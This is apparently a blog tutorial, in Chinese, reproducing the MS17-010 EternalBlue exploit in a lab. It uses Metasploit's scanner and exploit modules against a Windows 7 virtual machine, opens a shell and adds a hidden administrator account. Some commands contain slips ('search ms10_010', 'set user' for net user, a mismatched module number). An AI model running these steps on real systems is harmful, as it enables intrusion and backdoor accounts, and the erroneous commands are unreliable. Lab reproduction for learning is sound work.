MS17_010永恒之蓝漏洞复现

一.所需设备

                       Linux kali2018,win7靶机(开启445端口,未安装永恒之蓝补丁)

二.复现步骤:

1.主机发现:

        在保证攻击机与靶机处于同一网络环境下时,首先登录kali2018,通过ifconfig语句查看攻击机自身ip地址

ifconfig

      MS17_010永恒之蓝漏洞复现_第1张图片

 在知道自身IP地址后,我们可以通过网络标识来搜寻靶机IP。使用nmap语句进行搜索

nmap 192.168.171.0/24

MS17_010永恒之蓝漏洞复现_第2张图片

 找到445端口打开的IP地址,即我们的靶机IP地址。永恒之蓝漏洞正是利用445端口的SMB服务,操作系统溢出漏洞。

2.使用MSF的永恒之蓝漏洞模块

在确定靶机的IP地址后,我们就可以尝试对靶机的攻击。首先在终端中使用msfconsole语句打开MSF

MS17_010永恒之蓝漏洞复现_第3张图片

打开MSF后,使用search语句搜索ms17-010

search ms10_010

MS17_010永恒之蓝漏洞复现_第4张图片

 这里可以看到有关ms17-010的一些工具,比如0号exploit/windows/smb/ms17_010_eternalblue是永恒之蓝模块的攻击语句,3号的auxiliary/scanner/smb/smb_ms17_010是永恒之蓝模块的扫描语句。一般我们先使用扫描模块对靶机的漏洞进行扫描 ,确定目标具有攻击的条件后,使用攻击模块进行攻击。

  3.使用扫描模块对靶机进行扫描:

使用use语句使用相关的模块。在使用use语句时,可以接模块全名,也可以接模块前面的编号。

use 2

 在使用set语句确定目标IP后,我们就可以执行该模块。

set rhosts 192.168.171.129

 使用run来执行模块

 在得到划红线的结果后,说明靶机存在漏洞,可以使用永恒之蓝漏洞进行攻击

4.使用ms17-010攻击模块对靶机进行攻击

使用use语句使用ms17-010攻击模块

use 0

 使用set语句设置目标IP

set rhosts 192.168.171.129

 设置攻击端口

set rport 445

 使用run语句执行攻击模块

  攻击成功后得到如下界面

MS17_010永恒之蓝漏洞复现_第5张图片

注:在执行攻击模块后我多次得到此失败语句,在网络上查询无解决方法后,重启靶机,语句执行成功

 5.使用终端后台远程控制靶机

在攻击模块执行成功后,我们便拥有了对靶机的控控制权。使用shell命令进入靶机

shell

 可以看到此时显示的是乱码,通过chcp语句解决乱码问题

chcp 65001

 使用ipconfig语句查询本机ip

MS17_010永恒之蓝漏洞复现_第6张图片

 可以看到此时我们已经进入靶机内部。现在我们可以使用windows指令对靶机进行操控。

(1)创建一个新用户,通过net user语句执行

set user lemofox 123456 /add

 (2)将用户设置为管理员,使用set localgroup语句执行

net localgroup administrators lemofox /add

此时我们打开靶机,可以看到新建了一个管理员账户

MS17_010永恒之蓝漏洞复现_第7张图片

 (3)进入桌面,使用cd语句执行

cd C:\Users\Lenovo\Desktop

 注:不同的靶机进入的文件夹不同,可能会有所变化

 (4)在桌面上新建一个文件夹,使用md语句执行

md 1

 此时打开虚拟机桌面,可以看到多了一个文件夹,说明语句执行成功

MS17_010永恒之蓝漏洞复现_第8张图片

你可能感兴趣的:(安全,web安全)